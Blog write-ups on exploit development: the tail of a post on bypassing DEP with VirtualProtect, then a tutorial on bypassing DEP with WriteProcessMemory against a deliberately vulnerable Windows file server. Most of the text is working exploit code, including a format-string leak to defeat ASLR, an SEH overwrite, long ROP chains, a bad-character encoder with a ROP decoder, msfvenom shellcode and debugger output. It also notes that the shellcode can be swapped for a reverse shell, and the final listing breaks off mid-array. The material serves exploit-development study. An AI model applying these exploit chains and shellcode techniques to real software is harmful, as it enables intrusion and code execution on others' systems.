sc += b"\xcc\x42\xa7\x26\xf3\xad\x69\x78\x27\xda\x23\x0f\xca"
sc += b"\x42\x30\x38\x21\xb7\x69\x78\xa0\x2c\xea\xa7\x1c\xd1"
sc += b"\x76\xd8\x99\x91\xd1\xbe\xee\x45\xfc\xad\xcf\xd5\x43"
sc += b"\xce\xfd\x46\xf5\x83\xf9\x52\xf3\xad\x9c\x2a\x96"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      # EBX
      # Blocked: None
      0x4CBFB + binary_base,  # pop eax; ret;
      0xa2bf44ce,             # put delta into eax (goal: 0x00000501 into ebx)
      0x7720E + binary_base,  # add eax,5D40C033; ret;
      0x3AE24 + binary_base,  # xchg eax, ebx; ret;

      # EDX
      # Blocked: EBX
      0x4CBD7 + binary_base,  # pop eax; ret;
      0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
      0x76EFF + binary_base,  # add eax, 0x5D58026A       
      0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
      0x41414141,             # dummy

      # ECX
      # Blocked: EBX, EDX
      0x72D31 + binary_base,  # pop ecx; ret;
      0xA635A + binary_base,  # &writable location

      # EDI
      # Blocked: EBX, EDX, ECX
      0x32301 + binary_base,  # pop edi; ret;
      0x774C7 + binary_base,  # ropnop

      # ESI
      # Blocked EBX, EDX, ECX, EDI
      0x24261 + binary_base,  # pop esi; ret;      
      0x14AF9 + binary_base,  # jmp eax (just stored, not executed)

      # EAX
      # Blocked EBX, EDX, ECX, EDI, ESI
      0x704F4 + binary_base,  # pop eax; ret;
      0x9015C + binary_base,  # IAT WriteFile
      0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x113AB + binary_base,  # sub eax,1000 
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x41414141,
      0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
      0x7D695 + binary_base,  # pop ebp dummy 

      0x752EC + binary_base,  # pushad
      0x11394 + binary_base,  # jmp esp
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += sc
buf += b"A" * (offset-len(rop)-len(sc))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close() 

The post Bypassing DEP with VirtualProtect (x86) appeared first on Vulndev.

Bypassing DEP with WriteProcessMemory (x86)

By: xct
12 June 2022 at 12:31

Intro

In this post I will show an example on how to bypass DEP with WriteProcessMemory. This is a bit more complicated than doing it with VirtualProtect but nonetheless an interesting technical challenge. For the target binary I will use rainbow2.exe from my vulnbins repository.

I will skip the reversing/vulnerability discovery part for this post (feel free to explore it by yourself) – essentially we have a file server that has 2 commands:

LST <PATH>
GET <PATH>

Enabled protections are GS, ASLR & DEP. The binary has (at least) 2 vulnerabilities, a format-string vulnerability in path & a stack overflow that is also in path. Note that if you want to play with the binary you have to put it in C:\shared\ as it expects this as the file root.

Format String Vulnerability

By supplying a path containing format string specifies like %p, we can leak the contents of the stack. This will allow us to leak a pointer from the binary, calculate the binaries base address & therefore defeating ASLR.

Stack Overflow

By supplying a path longer than 1024 we overflow a stack buffer. Since GS is enabled we can not just write through the stack cookie and over the return address in order to exploit it. We can however provide a sufficiently large buffer so that the SEH handler gets overwritten, which defeats GS as we can continue execution from there without returning from the function.

Getting Started

Knowing the vulnerabilities we start by writing an exploit poc that leaks the base address:

#!/usr/bin/env python3
from pwn import *

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

We connect to the server and send LST |%p|%p|%p|%p|, which leaks 4 pointers from the stack:

[DEBUG] Sent 0x12 bytes:
    b'LST |%p|%p|%p|%p|\n'
[DEBUG] Received 0x41 bytes:
    b'ERROR: Can not open Path: |8ACA5DF4|3FAC4120|3FAC4120|0133E550|\n'

In WinDBG we can see that 0x3fac4120 is an address of the binary itself. We calculate the difference of this pointer to the load address of the binary:

0:001> ? 3fac4120-3fab0000 
Evaluate expression: 82208 = 00014120

Since this offset does not change between restarts and the leaked pointer is always the 2nd value on the stack, we can reliably subtract it to get the base address of the binary. If you are used to binary exploitation on linux you might wonder if we can use %n here to get a write primitive. This is not possible because Visual Studio prevents %n usage by default.

The next task is to find the offset at which we overwrite SEH. To do so we generate a pattern (msf-pattern_create -l 4000), send it and use it to get the offset (msf-pattern_offset -q ... -l 4000) at which we have to put the value that overwrites our SEH entry. We don’t know much about the required length yet but trying a few values and observing if any of them crashes the application and if a pattern value appears on !exchain is a viable approach. Eventually this will lead to the offset 1032.

With these new insights we can update the poc to crash the target and place Bs inside SEH & Cs inside NSEH.

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += b"A" * (offset)
buf += b"B" * 4 # nseh
buf += b"C" * 4 # seh
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close()  
0:001> !exchain
0170f6a0: 43434343 (SEH)
Invalid exception stack at 42424242 (NSEH)

Warming Up

Now we have to find a single gadget that somehow gets us back to our input buffer.

0:001> r esp
esp=0170eab0
0:001> s -a 0 L?80000000 "AAAAAAAAAAAAAAA"
0133e66c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
015205c0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
...
0170f298  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

We find the start of our As is 3 times in memory. The last one looks like the most promising one because it’s somewhat close to our stack pointer:

0:001> ? 0170f298 - 0170eab0
Evaluate expression: 2024 = 000007e8

To find a gadget that can jump that far (or bit a further, it does not have to be exact) we can use ropper:

ropper --file rainbow2.exe --console
search add esp, %
...
0x4011139d: add esp, 0xd60; ret;
0x40111396: add esp, 0xe10; ret;
...

These look promising. We replace the Bs with the gadget that adds 0xe10 to esp, taking the leaked binary base into account and then run the exploit again.

...
buf += b"B" * 4 # nseh
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
...

We set a breakpoint on the gadget and see if we can hit our buffer:

0:003> !exchain
0164fbd4: filesrv+11396 (3fac1396)
Invalid exception stack at 42424242
0:003> ba e1 3fac1396
0:003> g
Breakpoint 0 hit
filesrv+0x11396:
3fac1396 81c4100e0000    add     esp,0E10h
0:003> p
3fac139c c3              ret
0:003> dd esp
0164f844  41414141 41414141 41414141 4141414

We indeed managed to land inside our buffer, more precisely at the part before our SEH gadget. By going back a bit we can see that we are about 0x78 bytes into our buffer.

0:003> dd esp-80 L40
0164f7c4  00000000 0000000f 41414141 41414141
0164f7d4  41414141 41414141 41414141 41414141
...

This is pretty good since we placed 1036 As and most of them are still ahead of us, leaving us with some room to work with. Since DEP is enabled, we can not simply execute shellcode here and have to think about how we can utilize ROP to make progress.

Playing with ROP

Ultimately we want to call a function that allows us to get around DEP and execute shellcode. Good candidates are VirtualProtect, VirtualAlloc or WriteProcessMemory. Since we are on x86, the arguments for function calls will be placed on the stack. I’m aware of 2 different approaches to setup function arguments in this situation. We could carefully prepare the registers and then execute pushad so the values are put onto the stack – this has all to be done in ROP though and everytime you setup a register you can not use it anymore later on which makes this a bit tricky.

Another approach is to prepare a call “skeleton”, an area that has dummy values for the function arguments on the stack. We then get a reference to the skeleton and replace the dummy values with the ones we need. In the end we pivot the stack to the skeleton and therefore execute the function we want.

As mentioned in the beginning, for this post we want to call WriteProcessMemory. This will allow us to write our shellcode to a codecave that is already executable but not writeable. WriteProcessMemory internally calls VirtualProtect to temporarily make the area writeable, writes the data & then restores memory permissions. WriteProcessMemory has the following Signature:

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

Which in our skeleton looks like this:

0xffffffff, # hProcess (-1 == current process)
codecave,   # lpBaseAddress (dst)
0x42424242, # lpBuffer (src) 
0x43434343, # nSize
writeable,  # lpNumberOfBytesWritten

This approach has one caveat – if we have to avoid bad bytes in our shellcode and we copy it to a non writable area, we can not use any shellcode that needs to modify itself (e.g. all msfencoders). In order to get around that we will have to do the shellcode encoding before we send it and then use ROP to decode it, while it is still on the stack (before we copy it & jump to the codecave copy).

To discover bad bytes we send all bytes from 0x00 – 0xFF and remove all the ones where the binary does not crash anymore or those that get mangled. This results in the following bad chars:

\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C

Since it will be pretty difficult to craft shellcode that does not contain any of these we will go with the ROP shellcode decoder as just mentioned. Before we dive into that, let’s look at the structure the exploit is going to have. Since we are dealing with some space restrictions we have to be careful about the layout.

LST | Skeleton + RopNops + Decoder + RopNops | NSEH (dummy) + SEH (stack pivot) | RopNops + RopWriteProcessMemorySetup + Shellcode + Padding |
    | ----------------1036-------------------|----------------8-----------------|------------------------ ~2200 -----------------------------|

Note that even though we send 4000 Bytes, not all of them will end up on the stack. We are running into a page boundary which will cut it more closer to 3200-3300 Bytes.

Shellcode Encoding & Decoding

The first problem we are going to tackle is the Shellcode encoding & decoding. Our shellcode for this post will be the following one:

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -e none
sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

As you can see we did not use any encoder since we will be doing that ourselves. Before we send anything, we do our custom encoding and since they are not that many bad chars I decided to subtract 0x55 from every bad character. The bad characters were all rather small so subtracting a value like 0x55 brings them to byte values that should be safe. If you have more bad characters you could also do an individual offset for every character or substition tables.

We iterate over the shellcode and identify the indices of all bad characters. Then we substract the offset (here 0x55) from all bad chars so they become “safe”, e.g.: 0x20 - 0x55 = 0xcb.

def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			  new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacments: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)

With our shellcode encoded, we now have to start building the ROP decoder that will undo our changes to the shellcode:

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)   # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
    rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

First we get a copy of esp into ecx. Then we load eax with 0x522 and increment it – the point here is to get the offset from the stack pointer to our shellcode (since the ROP decoder needs to start decoding exactly at the start of our shellcode). After the first part is done, eax holds the start address of our shellcode as required.

We then loop over all indices of bad chars in our shellcode, advancing eax so it always points to the next bad char. We then increment the byte value at the location by 0x55, reversing the encoding operation. Note that this adds 7*4=28 bytes for every bad char and we don’t have much more than 1000 bytes for this rop decoder, which means that we are limited in the amount of bad chars we can handle (about 30).

Before moving on let’s observe one time how the decoder is modifying a badchar:

filesrv+0x7f17a:
3fb2f17a 0008            add     byte ptr [eax],cl          ds:002b:00c1fd60=cb
0:001> r eax
eax=00c1fd60 <- Write Target
0:001> r ecx
ecx=11111155 <- Low Byte is Write Value

0:001> dd eax
00c1fd60  64db31cb <- 0x20 - 0x55 = 0xcb
0:001> p
0:001> dd eax
00c1fd60  64db3120 <- 0xcb + 0x55 = 0x20

This shows that we can successfully decode our shellcode bad chars.

Working with Skeletons

Now it’s time to replace the dummy values for the call to WriteProcessMemory we placed on the very top of our buffer on the stack. We don’t have much room after our rop decoder & before our stack pivot gadget – so we will fill up with ropnops (just ret instructions) and jump over our gadget as follows:

rop1 = b""
# add skeleton
for g in skeleton:
      rop 1+= p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop)-4, 4):
      rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += b"D" * (size-len(buf))
p.sendline(buf)
0:003> dd esp L100
...
0112f710  3fab159d 3fab159d 3fab159d 3fab159d
0112f720  3faeda53 3fac1396 3fac1396 44444444 <- Jump over SEH entry
0112f730  44444444 44444444 44444444 44444444
0:003> ba e1 filesrv+0x3da53
0:003> g
filesrv+0x3da53:
3faeda53 83c410          add     esp,10h
0:003> dd esp
018ff820  3fac1396 3fac1396 44444444 44444444

This leaves us now in the “big” area of our payload where we can write the rop chain to modify the skeleton & also have our shellcode. Our first task is to align a register (here ecx) with our skeleton.

0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
writeable,
0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
0x704F4 + binary_base,  # pop eax; ret;
0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7609f + binary_base,  # add eax, 4; ret;
0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
0x41414141,
0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
0x41414141,

WinDBG shows that ecx is now indeed aligned with our skeleton:

0:001> dd ecx
009df688  41414141 3fab1010 ffffffff 3fab1010
009df698  42424242 43434343 3fb5635a 3fab159d

After having a pointer to the skeleton we can proceed to replace the dummy values. The first one (where we placed As) is the address to WriteProcessMemory. We do not have a kernel32 leak so we have to find another way to get its address. If we look at the binaries Import Address Table (IAT), we can see that it imports quite a bit of functions but none of them is WriteProcessMemory:

This is unfortunate but we can use another function from kernel32 & calculate the offset to WriteProcessMemory from that address. The only downside is that we lose some portability as we would have to know the targets windows version & patch level or need a copy of its kernel32.dll. We can use WinDBG to get the offset:

0:003> ? kernel32!writeprocessmemorystub - kernel32!writefile
Evaluate expression: 72848 = 00011c90

Now we can extend our ropchain to dereference the IAT entry of WriteFile, add the offset & then write this value to our skeleton:

0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax]
0x636a2 + binary_base,  # pop edx; ret;
0xfffee370,             # -00011c90, offset from WriteFile to WriteProcessMemory
0x59a05 + binary_base,  # sub eax, edx; pop ebp; ret;
0x41414141,
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;

We can confirm in WinDBG that value has been written:

filesrv+0x7ab35:
3fb2ab35 8901            mov     dword ptr [ecx],eax  ds:002b:019bf370=41414141
0:003> dd ecx
019bf370  41414141 3fab1010 ffffffff 3fab1010
0:003> p
3fb2ab37 5d              pop     ebp
0:003> dd ecx
019bf370  76c45240 3fab1010 ffffffff 3fab1010

Now we move the skeleton pointer ahead to point to the next value we want to replace:

0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 4
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 8
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 12
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 16
0x0582b + binary_base, # inc ecx; ret 0;

The next value we want to write is the shellcode address on the stack – this is the source of the copy operation that WriteProcessMemory will be doing. To get a pointer to our shellcode we have look in the debugger how big the difference from the current esp at this point to the start of the shellcode is. In this case, the following gadgets move eax exactly to the start of the shellcode & writes it to where ecx points to (which is still the next skeleton value to overwrite):

0x16238 + binary_base, # mov eax, ecx; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
0x41414141,
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x7ab35 + binary_base, #: mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf380  019bf915 43434343 3fb5635a 3fab159d

The next value we have to replace is the size. We have to chose a value that is enough for our shellcode but not too big as to not cause issues. The following rop gadgets move the skeleton pointer once again ahead and place the value of 0x401 as a size value, which is enough to hold our shellcode.

# Write size (0x401) to skeleton dummy value
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x704F4 + binary_base,  # pop eax
0x19b3  + binary_base,  # addr of 0x401;
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf384  00001040  3fb5635a 3fab159d 3fab159d

At this point the only thing left to do is the align ecx again with the start of our skeleton (we increased it for every dummy value replacement) and then pivot the stack exactly to the skeleton:

0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x8b299 + binary_base,  # mov esp, ecx; ret;

When we break on this last stack pivot gadget we can see that we indeed return into WriteProcessMemory! Note that directly after this address we placed the address of the codecave which means that we will return into the shellcode after WriteProcessMemory is done. We confirm in WinDBG that that we can step the nops in our shellcode after returning from the function:

filesrv+0x8b29b:
3fb3b29b c3              ret
0:003> p
KERNEL32!WriteProcessMemoryStub:
76c45240 8bff            mov     edi,edi
0:003> pt
KERNELBASE!WriteProcessMemory+0x7e:
76b19dfe c21400          ret     14h
0:003> p
filesrv+0x1010:
3fab1010 90              nop
filesrv+0x1011:
3fab1011 90              nop
...

This indeed worked. If we now let execution continue we get our calc:

To get a reverse shell we can replace the shellcode but it still needs to have not more than about 30 bad characters. This can be a bit tricky when using msfvenom but is not difficult to achieve with custom shellcode that is already null-byte free (so the rop decoder does not have to do it).

Finally here is the complete exploit:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)  # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
	rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

# since this is writeprocessmemory, we will have to encode the shellcode & decode it via rop
def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			  new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacments: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)
print(f"Amount of bad chars in sc: {len(bad_indices)}")

pivot = p32(binary_base + 0x11396)  # add esp,0xD60  
writeable = 0xa635a + binary_base
codecave =  0x1010 + binary_base

skeleton = [
	0x41414141, # WriteProcessMemory address (IAT WriteFile + offset)
	codecave,   # Shellcode Return Address
	0xffffffff, # Pseudo process handle to current process (-1)
	codecave,   # Code cave address (write where)
